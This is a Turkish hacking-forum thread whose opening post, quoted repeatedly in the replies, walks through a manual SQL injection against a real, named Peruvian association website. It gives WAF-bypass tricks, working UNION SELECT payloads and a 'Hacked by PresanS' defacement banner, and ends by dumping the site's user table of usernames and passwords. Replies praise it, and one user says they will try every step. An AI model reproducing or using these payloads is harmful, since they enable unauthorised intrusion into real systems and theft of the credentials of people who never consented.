Manuel SQL İnjection, Waff bypass denemesi #1

Darach

Yeni üye
16 Ocak 2019
50
3
Öncelikle Herkese Selamun Aleyküm Arkadaşlar



Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz,basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
MdYz7.png



Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .


MdoDa.png


Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A



MyHkY.png


dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-


Myb5M.png



Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

M1byu.png


sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-


N7HXaG.png



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-


M1AyL.png


Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-


M1gjs.png





burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-


M1JuB.png





Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.


ellerine sağlık.
 

GMR148

Yeni üye
9 Kas 2021
32
12


4sx426.gif

Öncelikle Herkese Selamun Aleyküm Arkadaşlar

KhJDZS.gif


Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27


Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .

http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

unknown.png



Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A


KhJDZS.gif

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-



unknown.png




Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-



unknown.png

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-



unknown.png






burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-



unknown.png



KhJDZS.gif


Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
M5MAyv.gif
Elinize sağlık çok güzel konu olmuş.

Ben birşey sormak daha doğrusu öğrenmek istiyorum bu bypass komutlarını nerden öğrendiniz nasıl kullanılacağını nerden biliyorsunuz?
Detaylı bir komu açabilirmisiniz sıfırdan öğrenmeye çalışıyorum da🤔🙃

Örneğin bunları;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */

AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-


Ayrıca bir sitede nasıl açık bulabilirim dork kullanmadan belirli bir site üzerinde?
 

UZAY 52

Uzman üye
14 Ağu 2021
1,298
832
Ddos
Ben birşey sormak daha doğrusu öğrenmek istiyorum bu bypass komutlarını nerden öğrendiniz nasıl kullanılacağını nerden biliyorsunuz?
Detaylı bir komu açabilirmisiniz sıfırdan öğrenmeye çalışıyorum da🤔🙃

Örneğin bunları;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */

AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-


Ayrıca bir sitede nasıl açık bulabilirim dork kullanmadan belirli bir site üzerinde?
Knk bu konular çok karışık burdan anlatamam ama sitede açık bulman için popüler kali toolları squlmap ve nmap dir ek olarak dnsenum da kullanabilirsin
 

GMR148

Yeni üye
9 Kas 2021
32
12
Knk bu konular çok karışık burdan anlatamam ama sitede açık bulman için popüler kali toolları squlmap ve nmap dir ek olarak dnsenum da kullanabilirsin
Sqlmap ve nmapde açık bulunmuyor bildiğim kadarıyla? daha önce söylemiştim başka bir konuda sana.
Bulunuyorda ben mi bilmiyorum anlamadım?

Eğer bilgi sahibiysen
DM'den yazabilirsin öğrenmek istiyorum çünkü 🙃
 
Son düzenleme:
2 Şub 2022
70
27


4sx426.gif

Öncelikle Herkese Selamun Aleyküm Arkadaşlar

KhJDZS.gif


Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27


Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .

http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

unknown.png



Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A


KhJDZS.gif

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-



unknown.png




Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-



unknown.png

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-



unknown.png






burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-



unknown.png



KhJDZS.gif


Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
M5MAyv.gif
Elinize sağlık
 

GökBörü.

Turan Ordusu Senior
20 Haz 2021
1,832
1,046
Kara Harp Okulu


4sx426.gif

Öncelikle Herkese Selamun Aleyküm Arkadaşlar

KhJDZS.gif


Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27


Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .

http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

unknown.png



Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A


KhJDZS.gif

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-



unknown.png




Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-



unknown.png

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-



unknown.png






burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-



unknown.png



KhJDZS.gif


Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
M5MAyv.gif
çok güzel olmuş lakin linux üzerinden bilmeyen arkadaşlarada kodlarını nasıl yaptıgını falanda gösterseydin çok güzel olurdu lakin eline emegine yüreğine sağlık
 

PresanS

Kıdemli Üye
8 Ocak 2017
2,470
202
24
Debian
Aleyküm selam, Teşekkürler arkadaşlar.. Videolu anlatım çekmedim hiç malesef.

çok güzel olmuş lakin linux üzerinden bilmeyen arkadaşlarada kodlarını nasıl yaptıgını falanda gösterseydin çok güzel olurdu lakin eline emegine yüreğine sağlık
Linux üzerinden ne farkı var anlamadım?
 

rootibo

Kıdemli Üye
13 Mar 2023
2,168
1,459


4sx426.gif

Öncelikle Herkese Selamun Aleyküm Arkadaşlar

KhJDZS.gif


Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27


Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .

http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

unknown.png



Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A


KhJDZS.gif

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-



unknown.png




Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-



unknown.png

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-



unknown.png






burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-



unknown.png



KhJDZS.gif


Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
M5MAyv.gif
Birkac aydir boyle bir konu ariyordum ellerinize saglik simdi hepsini tek tek deniyecegim
 
27 May 2023
188
44


4sx426.gif

Öncelikle Herkese Selamun Aleyküm Arkadaşlar

KhJDZS.gif


Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27


Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .

http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

unknown.png



Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A


KhJDZS.gif

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-



unknown.png




Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-



unknown.png

Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-



unknown.png






burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-



unknown.png



KhJDZS.gif


Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.
M5MAyv.gif
Eline Sağlık
 

Butcherb3y

Uzman üye
1 Eyl 2022
1,477
1,116
Anıtkabir


4sx426.gif

Öncelikle Herkese Selamun Aleyküm Arkadaşlar

KhJDZS.gif


Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz, basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;

http://jdccpp.org.pe/detalle-seminario.php?id=93%27


Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .

http://jdccpp.org.pe/detalle-seminario.php?id=93'+GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--+-

unknown.png



Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A


KhJDZS.gif

dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-



unknown.png




